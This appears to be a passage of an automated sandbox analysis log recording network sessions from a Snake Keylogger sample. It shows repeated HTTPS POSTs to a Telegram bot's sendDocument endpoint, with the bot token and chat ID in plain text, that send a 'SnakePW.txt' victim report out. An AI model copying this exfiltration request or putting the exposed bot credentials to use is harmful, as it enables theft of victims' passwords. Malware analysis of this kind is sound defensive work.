                            Date: Sun, 26 Jun 2022 07:34:49 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:49 UTC519INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67095,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228889,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            308192.168.2.550242149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:50 UTC520OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571e10c94e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:50 UTC520OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 31 30 63 39 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571e10c94eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:50 UTC520INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:50 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:50 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67096,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228890,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            309192.168.2.550243149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:50 UTC521OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571e4a018c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:50 UTC522OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 34 61 30 31 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571e4a018cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:50 UTC522INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:50 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:50 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67097,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228890,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            31192.168.2.549801149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:51 UTC52OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dbd4e751
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:51 UTC52OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 64 34 65 37 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dbd4e751Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:51 UTC53INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:51 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:51 UTC53INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66778,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228771,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            310192.168.2.550244149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:50 UTC523OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571e833a3a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:50 UTC523OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 38 33 33 61 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571e833a3aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:51 UTC524INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:51 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:51 UTC524INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67098,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228891,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            311192.168.2.550245149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:51 UTC525OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ebc7253
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:51 UTC525OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 62 63 37 32 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ebc7253Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:51 UTC526INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:51 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:51 UTC526INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67099,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228891,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            312192.168.2.550247149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:51 UTC526OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ef80d03
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:51 UTC527OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 66 38 30 64 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ef80d03Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:51 UTC527INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:51 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:51 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67100,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228891,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            313192.168.2.550248149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:51 UTC528OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571f314595
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:51 UTC528OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 66 33 31 34 35 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571f314595Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:52 UTC529INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:52 UTC529INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 31 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
